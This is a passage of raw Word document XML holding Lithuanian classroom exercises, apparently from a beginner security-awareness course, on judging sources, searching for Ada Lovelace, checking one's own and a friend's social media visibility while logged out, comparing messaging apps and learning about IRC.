          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>faktais nei</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">subjektyvia </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nuomon</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> paremtą informaciją?</w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Iš</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942E4A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ko taip sprendžiate?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC04128" w14:textId="201AB031"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 xml:space="preserve">Google paieškoje įveskite </w:t>
      </w:r>
      <w:r w:rsidR="0099657D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ada Lovelace</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“. Ar matote rezultatus iš wikis tipo puslapių?</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pakomentuokite kodėl?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF43C7D" w14:textId="4797A396"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 xml:space="preserve">Nueikite į Vikipediją ir pakartokite </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>analogišką</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paiešką</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, kurią atlikote </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotyje</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Paskaitykite straipsnį, kurį rasite apie </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Ada Lovelace</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Ar jis buvo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>paieško</w:t>
      </w:r>
      <w:r w:rsidR="000544CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F438A6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981107" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rezultatuose</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Glaustai pakomentuokite kodėl?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDBCE9" w14:textId="044ED2CF"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Google paieškoje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ieškokite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">informacijos apie </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sav</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Ar</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasisekė rasti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informacijos</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kuri yra susij</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>usi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> su j</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ūsų gyvenimu, aplinka</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir asmenybe</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">? Ar </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>radote</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>rezultatų, kurie yra iš socialinės žiniasklaidos svetain</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ių</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jeigu taip, glaustai j</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uos</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pakomentuokite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5CF33" w14:textId="46C95C0E" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="006E27DC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ikite į </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ūsų naudojamą socialinės žiniasklaidos svetainę. Neprisijunkite, bet pakartokite paiešką</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> taip</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, lyg jūs</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">šioje svetainėje </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>būtumėte pašalinis asmuo. Kiek</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informacijos</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kaip pašalinis asmuo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gal</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ėjote</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">sužinoti apie save? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>autus rezultatus pateikite abstrakčiai: rasta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> daug</w:t>
      </w:r>
      <w:r w:rsidR="0043556D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0043556D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>mažai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informacij</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">os, informacijos visai </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nerasta ar pan.</w:t>
      </w:r>
      <w:r w:rsidR="00DA4642" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F827D" w14:textId="3B65E42A"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Nueikite į socialinės žiniasklaidos tinklapį, kur</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iuo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>naudoja</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">jūsų draugas. </w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>eigu turite paskyrą</w:t>
      </w:r>
      <w:r w:rsidR="006E27DC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, neprisijunkite</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Pai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>eškokite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tinklalapyje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">macijos apie </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>savo draug</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Kiek</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informacijos</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> apie savo draugą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">galite sužinoti </w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tokiu būdu</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>autus rezultatus pateikite abstrakčiai: rasta</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>daug</w:t>
      </w:r>
      <w:r w:rsidR="00825160" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00825160" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">mažai </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>informacijos,</w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> informacijos visiškai</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nerasta ar pan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE12110" w14:textId="4156BF19" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00B442B2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Internete s</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>uraskite tris momentinių žinučių programas. Kuo jos skiriasi</w:t>
      </w:r>
      <w:r w:rsidR="00C95064" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">viena nuo kitos </w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>? Ar jas visas galima naudoti bendravimui?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57BB73" w14:textId="1A949ABB"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Išsiaiškinkite, kas yra IRC ir kaip prie jo prisijungti. Ar galite sužinoti, kokiame tinkle yra HACK kanala</w:t>
      </w:r>
      <w:r w:rsidR="00B442B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s?</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A241D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
